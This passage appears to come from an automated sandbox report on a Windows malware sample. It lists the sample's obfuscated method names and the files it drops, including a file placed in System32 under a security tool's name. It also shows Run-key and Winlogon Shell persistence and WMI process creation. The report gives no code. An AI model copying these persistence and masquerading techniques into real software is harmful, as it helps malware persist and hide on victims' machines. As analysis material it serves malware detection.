Source: W4tW72sfAD.exe, C9C.cs High entropy of concatenated method names: '_34V', 'y7u', 'PG4', '_7FG', 'gt1', 'xQ8vItNOMrfZDHGXGPn', 'HddjerNqW3Us5pFKYmY', 'rg92rcNEcCBbI1j4X7x', 'UEqiP8Nz02qZhy2d91Q', 'YFZcAw7eJPV2rZd21JX'
Source: W4tW72sfAD.exe, 7YK.cs High entropy of concatenated method names: '_2N6', '_22i', '_239', 'liwnEqgBUaHQPQTWQXm', 'thA7TngpdaSZ9sVppfp', 'mondHBgjJFa1WaQHdkp', 'nZTecSgWr2YuldClLQI', 'MtbdNVgPpdWcbmJBlIx', 'bUu09agJcr5SE67qwYU', 'wNRTNJgU35NQ0sJUsgd'
Source: W4tW72sfAD.exe, 6pX.cs High entropy of concatenated method names: '_966', '_33e', 't8s', '_1Lg', '_127', 'LT8', 'mmGR5qBdPuN0EeUIoea', 'gImtKRBf5mINDvHD2Ye', 'z5eFoxB7Fd1EcRNqy5d', 'zsNMX1BtQpfKwGZoVOG'
Source: W4tW72sfAD.exe, 3Xk.cs High entropy of concatenated method names: 'zf8', 'R9w', '_182', 'G3G', '_75Z', 'E8M', 'vnBMtsKl26tI0hRI9Ph', 'GJlRm3KHLERrucv6i09', 'Axu7wXKA2R628xW4MeE', 'DI3sR3KTye6VUFv7L94'
Source: W4tW72sfAD.exe, Z2c.cs High entropy of concatenated method names: 'B58', 'rye', 'pEfbofS4FjCc7FXm20K', 'zxIsC4Sx7b60AOFxDWl', 'Tie95lSoSB5Skedoatc', 'UWDftNS5K3PsV19dTpy', 'raQg9iSO7CZQZTB7auP', 'Wcml0sSqsM0ran2VOY4', 'eRHhZwSEpfMDcrNpW2J', '_9f6'
Source: W4tW72sfAD.exe, r2O.cs High entropy of concatenated method names: 'uFH0d1Vg58NJgGWUkMt', 'j3FBw2VCScDCdxgTpjp', 'xKqPNFVFtDtYBQAi35O', 'XJCS6QVlfqIk6FTWJAE', 'X16', 'bCppakVvjvDRGnGKE6Q', 'jFuKhJVAZMdigsPpWZb', 'CJA9t8VTWUpoXaMdhBG', '_9S9', 'ailPoTVXooZovOiU1Ei'
Source: W4tW72sfAD.exe, X66.cs High entropy of concatenated method names: '_26F', '_5ml', '_376', '_1r8', 'z89', 'maepmm7Tauw9TpDKsQG', 'UfOhI97vbwy4D7mL7Zs', 'YghXHW7IZYEA9TLjUj2', 'FxLo687hgIk8DILE2Wj', 'sjADli7yZYB66yBvOSR'
Source: W4tW72sfAD.exe, s64.cs High entropy of concatenated method names: '_7P7', 'yt7', '_22g', 'xhGnWLC6wwZpN68WtLO', 'nFF4DRCGKR5AR0fGtge', 'Rc4jBECmCWvkZnJoxgi', 'oY3rGCCabMdiWiOISH3', 'WA2cybCkSA7TpiPbBnZ', 'Pgx9IaCwrONYACrbsxU', 'CTwHm0CYU8XMg7eBSIw'
Source: W4tW72sfAD.exe, 735.cs High entropy of concatenated method names: '_413', 'V29', '_351', '_2Q4', 'H7R', '_14W', '_8h4', 'QSkgPq9xpTt9L7asxuJ', 'fFo5WU9OkBAdeRvekWh', 'JsffSR9qtCD5fGUeud4'
Source: W4tW72sfAD.exe, 2T9.cs High entropy of concatenated method names: 'K77', '_5fJ', 'E32', '_9FP', '_55q', '_8E4', 'V27', 'J8g', '_0023Nn', 'Dispose'
Source: W4tW72sfAD.exe, rG4.cs High entropy of concatenated method names: '_5Z7', '_58k', '_4x4', 'bU6', '_3t4', 'a5C', 'iSkawnXLIwh7IxNX2OC', 'zA6RtmXQETAwfGY9UwP', 'nm79kTXNNEvGvkNuYvR', 'wxLHXBX7vvRiT1SRkKc'
Source: W4tW72sfAD.exe, r19.cs High entropy of concatenated method names: 'j9l', '_778', '_453', '_5c3', 'hE4', 'z3n', 'N42', 'CwiKKkfdhDyYjMIsunO', 'jbj8tZffg1b5ylHWi2T', 'CYfyvrf7ewb7pngASLk'
Source: W4tW72sfAD.exe, J68.cs High entropy of concatenated method names: 'SB9', 'Z7D', 'M62', '_1Xu', 'LuR', '_4p3', 'HVh', 'a37', '_96S', '_9s5'
Source: W4tW72sfAD.exe, c6y.cs High entropy of concatenated method names: 'v47', 'ACyjwjNihU1gTQY7OT3', 'RYhtwTQzRt3YfG7bdRj', 'ydTo6wNeuA3hySB5jLR', 'y0NOgANs6s9rT9mcNdI', 'ru1UJGNZcZ86JOiDU2l', '_53Y', 'd65', 'e16', 'B2m'
Source: W4tW72sfAD.exe, 39Q.cs High entropy of concatenated method names: '_66V', 'enekxuhSLegjGFwQYro', 'qVvBI7hKXqSq2tDlxLF', 'VBmqPVhcyZIB4a7LHKl', 'GShMr2hrFnO8nvq4niA', 'MQFRbXh1If4m443GkgK', 'o5QqprhDEgMS2iqMimD', 'LnUDQFhoEDx7aetKE83', 'kVylngh5grd6TkyL1r0', 'ICokdsh4fd7JyAHQyZB'
Source: W4tW72sfAD.exe, V66.cs High entropy of concatenated method names: 'rvt', 'K29', '_39k', 'iZ5ZqIBhk2g9Zmu8eah', 'U1Dn4KByhHKm798124B', 'wKuHnPBvssqE3McCNEU', 'tJb6SNBIXA46f0m9whX', 'brw2PYBXH5b8Ag5JiQB', 'btQLqsBLxyILXnfrWlf', 'rDo1B4BQfF3idyIrbRb'
Source: W4tW72sfAD.exe, r4r.cs High entropy of concatenated method names: '_228', '_34p', '_2r3', 'm3t', 'sC3', 'f4cjgEud6hPE6Z7jC4L', 'jymJAYu7JUt5reBGwUA', 'cZgUvTutYNhpeba5nhQ', 'seDSMnuflW9x5r5aRHR', 'pNEmLluu3oZWeFbeqHy'
Source: W4tW72sfAD.exe, Z47.cs High entropy of concatenated method names: '_57l', '_9m5', 't8K', 'k49', 'p65', '_3B1', '_4Pp', '_3M7', '_7b3', 'fAL'
Source: W4tW72sfAD.exe, gI2.cs High entropy of concatenated method names: 'G68', '_2c6', '_8U6', '_51G', 'PW5', '_1Fb', 'w5y', '_1FB', 'KXm', 'fE5'
Source: W4tW72sfAD.exe, k9J.cs High entropy of concatenated method names: 'vNq', 'O3Q', 'a43', 'V8g', 'g39', '_9By', 'h74', 'fl2', '_4L8', '_8e1'
Source: W4tW72sfAD.exe, 6m2.cs High entropy of concatenated method names: '_866', 'oy5', '_536', 'B6NghXgy7N5IU2L234G', 'cVgCMAgXWTKTDjcuQix', 'kDaYmlgINRPGCLEDKlG', 'tLvfwughP4FMqndlx6k', 't0HKS7gLjb99PJAYvQx', 'g2r', 'h95UZxgt472MeBv1a3i'
Source: W4tW72sfAD.exe, 7p8.cs High entropy of concatenated method names: 'k6u', '_13E', 'SoH', 'cyxgFFZPA5rQgCJxeNr', 'rferiJZVUbxiWJFXGFZ', 'hbpay4ZMcVsnxYe2RjA', 'SWZFR2ZJgJQXp4p51Dn', 'zOjDNfZBKjbc82Xu5M1', 'rs9ryaZpa9tEqNXlwkl', 'Q22kLPZjAG73PtpgSpm'
Source: W4tW72sfAD.exe, 386.cs High entropy of concatenated method names: 'Mic', '_7c8', 'WP9', 'EOG', 'dwE', '_397', '_4G4', '_6tB', '_16b', '_553'
Source: W4tW72sfAD.exe, cvm.cs High entropy of concatenated method names: 'M98', 'Kr8', 'DXB', 'o21', '_256', '_995', '_8oE', 'ZlJ', 'WEz', 'm51'
Source: W4tW72sfAD.exe, l65.cs High entropy of concatenated method names: 'c3G', 'V29', 'u9l', '_2Q4', '_78M', '_322', '_8h4', 'wBSEkT9VCvXltqaIRs4', 'Qgd87m9MsFNEEjf1lLk', 'cTW11x9PxBZOLX43U0i'
Source: W4tW72sfAD.exe, q2i.cs High entropy of concatenated method names: '_7O6', 'o8v', 'gkM0FMvPfnhHBD5LFaT', 'pZBcOCvJYrSBkovKMuV', 'WcVaZ8vBLhPCJJeV40O', 'GWLFJcvVQAVCwPwrNZJ', 'iqlCUevMYOtKwv5mDp6', 'iVXbNavptn41uQF2KKX', 'j0QsjRvjjj1JksLFQYL', 'wt60fHvWZsFhaBWKgch'
Source: W4tW72sfAD.exe, W58.cs High entropy of concatenated method names: 'aE3', '_42V', 'MTrSr6vFa7FIBrRR2ft', 'oXFQhUvgQnnXM3bV7qf', 'WNj2H6v965rJElw4oIC', 'LkFnQivChwUY4MkPAmt', 'um9uEpvlgwLvvCVn405', 'd1g', '_171', 'u6E'
Source: W4tW72sfAD.exe, 52Z.cs High entropy of concatenated method names: 'o19', 'box1nVA9h1QSs7sqa32', 'kvOCT6ACiQLdhC4fArq', 'M0a2kSAFkgxoAMUioQv', 'u8xYIYAs5qUIGvemMmd', 'ucaqUUAZU2mdKvbg8Dh', 'TitP36AAqShhphcaJEh', 'v3VwQRAl0s6FBuyUt9w', 'lWt7XbAH0GUJZjyXDKT', 'QFIqkXATNVXGZliwf62'
Source: W4tW72sfAD.exe, z8y.cs High entropy of concatenated method names: '_5E9', 'V29', 'e6S', '_2Q4', 'CVq', 'K17', '_8h4', 'RCEcv6CueCRlGjwD6Py', 'GEUNj2C8n7JHGyS29p5', 'I1HeSkC3K1DcjGYUn5F'
Source: W4tW72sfAD.exe, QTu.cs High entropy of concatenated method names: 'g49', 'Dph', 'P3C', 'newDOhygBvTYr2YP5EN', 'HVFQVdylO4ZGY2tFZB9', 'jEFYOUyCfuG1duVIh3i', 'A2fCoyyFlq5AKfsUTef', 'hkQnh1yHwfL8CbQo9Ny', 'sTCphjyAdu9fdRAXqmF', 'C3BgqnyTqmZM7amgZEg'
Source: W4tW72sfAD.exe, 1o7.cs High entropy of concatenated method names: '_4FP', '_141', 'Snm', '_156', 'jfh', 'zIhg3p7084kuBrmwJpQ', 'grm9Qo7Ghl1Z3SlkCn7', 'EYvBCY7mtrVZyEP5yrj', 'iV42KQ76OW79Tuyqygj', 'QZOXCP7aci4PFmMrXxo'

Persistence and Installation Behavior

Source: C:\Users\user\Desktop\W4tW72sfAD.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\W4tW72sfAD.exe File written: C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe System file written: C:\Windows\System32\SecurityHealthSystray.exe
Source: C:\Users\user\Desktop\W4tW72sfAD.exe File created: C:\Users\user\Desktop\hSShNgSi.log
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Windows\System32\SecurityHealthSystray.exe
Source: C:\Users\user\Desktop\W4tW72sfAD.exe File created: C:\Users\user\Desktop\yzZxaXSF.log
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe File created: C:\Users\user\Desktop\NWsvAoLz.log
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe File created: C:\Users\user\Desktop\nweImycr.log
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe File created: C:\Users\user\Desktop\eSWSCFMK.log
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe File created: C:\Users\user\Desktop\VRHDyDUj.log
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe File created: C:\Users\user\Desktop\quERYeDq.log
Source: C:\Users\user\Desktop\W4tW72sfAD.exe File created: C:\Users\Public\Downloads\RuntimeBroker.exe
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe File created: C:\Users\user\Desktop\fAbTigaR.log
Source: C:\Users\user\Desktop\W4tW72sfAD.exe File created: C:\Users\user\Desktop\ekLJkSsv.log
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe File created: C:\Users\user\Desktop\wHsyCTFf.log
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe File created: C:\Users\user\Desktop\LionObPB.log
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe File created: C:\Users\user\Desktop\EkAnmMVM.log
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe File created: C:\Users\user\Desktop\rrfZteSl.log
Source: C:\Users\user\Desktop\W4tW72sfAD.exe File created: C:\Users\user\Desktop\ZpKsdnCB.log
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe File created: C:\Users\user\Desktop\GNRoGDmH.log
Source: C:\Users\user\Desktop\W4tW72sfAD.exe File created: C:\Users\user\Desktop\kdoiNyxj.log
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe File created: C:\Users\user\Desktop\QwkEqgro.log
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe File created: C:\Users\user\Desktop\HScOGmcH.log
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe File created: C:\Users\user\Desktop\DEgxfiAU.log
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe File created: C:\Users\user\Desktop\BazpdGXT.log
Source: C:\Users\user\Desktop\W4tW72sfAD.exe File created: C:\Users\user\Desktop\cnkBPSdA.log
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe File created: C:\Users\user\Desktop\ndjISZpy.log
Source: C:\Users\user\Desktop\W4tW72sfAD.exe File created: C:\Users\user\Desktop\JNNDResf.log
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe File created: C:\Users\user\Desktop\wexYWbhZ.log
Source: C:\Users\user\Desktop\W4tW72sfAD.exe File created: C:\Users\user\Desktop\NEEtYbtY.log
Source: C:\Users\user\Desktop\W4tW72sfAD.exe File created: C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe
Source: C:\Users\user\Desktop\W4tW72sfAD.exe File created: C:\Users\user\Desktop\IhtNKAXm.log
Source: C:\Users\user\Desktop\W4tW72sfAD.exe File created: C:\Program Files\Microsoft Office 15\ClientX64\juptXkyeRvGsIZrQGeVEsrnWhD.exe
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe File created: C:\Users\user\Desktop\WoNdSLwd.log
Source: C:\Users\user\Desktop\W4tW72sfAD.exe File created: C:\Users\user\Desktop\oQGhqvNX.log
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe File created: C:\Users\user\Desktop\UMwcyUfj.log
Source: C:\Users\user\Desktop\W4tW72sfAD.exe File created: C:\Users\Default\juptXkyeRvGsIZrQGeVEsrnWhD.exe
Source: C:\Users\user\Desktop\W4tW72sfAD.exe File created: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe File created: C:\Users\user\Desktop\BuKwfPUT.log

Boot Survival

Source: C:\Users\user\Desktop\W4tW72sfAD.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBroker
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run juptXkyeRvGsIZrQGeVEsrnWhD
Source: C:\Users\user\Desktop\W4tW72sfAD.exe File created: C:\Users\Default\juptXkyeRvGsIZrQGeVEsrnWhD.exe
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBroker
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run juptXkyeRvGsIZrQGeVEsrnWhD

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
